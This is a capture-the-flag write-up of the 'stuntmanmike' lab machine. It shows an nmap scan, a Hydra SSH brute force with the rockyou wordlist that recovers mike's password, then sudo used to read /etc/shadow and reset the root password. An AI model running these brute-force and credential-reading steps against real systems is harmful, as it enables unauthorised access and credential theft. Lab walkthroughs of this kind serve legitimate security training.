As always we start with a nmap scan

└──╼ $nmap -A
Starting Nmap 7.80 ( ) at 2021-01-15 09:59 GMT
Nmap scan report for
Host is up (0.032s latency).
Not shown: 998 closed ports
22/tcp open ssh OpenSSH 7.6p1 (protocol 2.0)
| ssh-hostkey: 
| 2048 b7:9e:99:ed:7e:e0:d5:83:ad:c9:ba:7c:f1:bc:44:06 (RSA)
| 256 7e:53:59:7b:2d:6c:3b:d7:21:28:cb:cb:78:af:99:78 (ECDSA)
|_ 256 c5:d2:2d:04:f9:69:40:4c:15:34:36:fe:83:1f:f3:44 (ED25519)
8089/tcp open ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2019-10-25T09:15:13
|_Not valid after: 2022-10-24T09:15:13

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 40.55 seconds
└──╼ #ssh root@
You are attempting to login to stuntman mike's server - FLAG35=724a2734e80ddbd78b2694dc5eb74db395403360
root@'s password:
└──╼ #hydra -l mike -P /usr/share/wordlists/rockyou.txt ssh://
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra ( starting at 2020-08-26 11:29:44
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://
[22][ssh] host: login: mike password: babygirl
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra ( finished at 2020-08-26 11:29:51
mike@stuntmanmike:~$ cat FLAG36

mike@stuntmanmike:~$ sudo -l
Matching Defaults entries for mike on stuntmanmike:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mike may run the following commands on stuntmanmike:
mike@stuntmanmike:~$ groups
mike adm cdrom sudo dip plugdev lxd
mike@stuntmanmike:~$ sudo cat /etc/shadow

mike@stuntmanmike:/$ sudo passwd root
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
mike@stuntmanmike:/$ su root
root@stuntmanmike:/# cd /root
root@stuntmanmike:~# cat FLAG37


However, if you see the following in the “Write-Up” box, you can publish online the explanations of how you compromised that box but we ask you in return to give us credit for the machines by adding backlink to  and  in your write-up.


Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *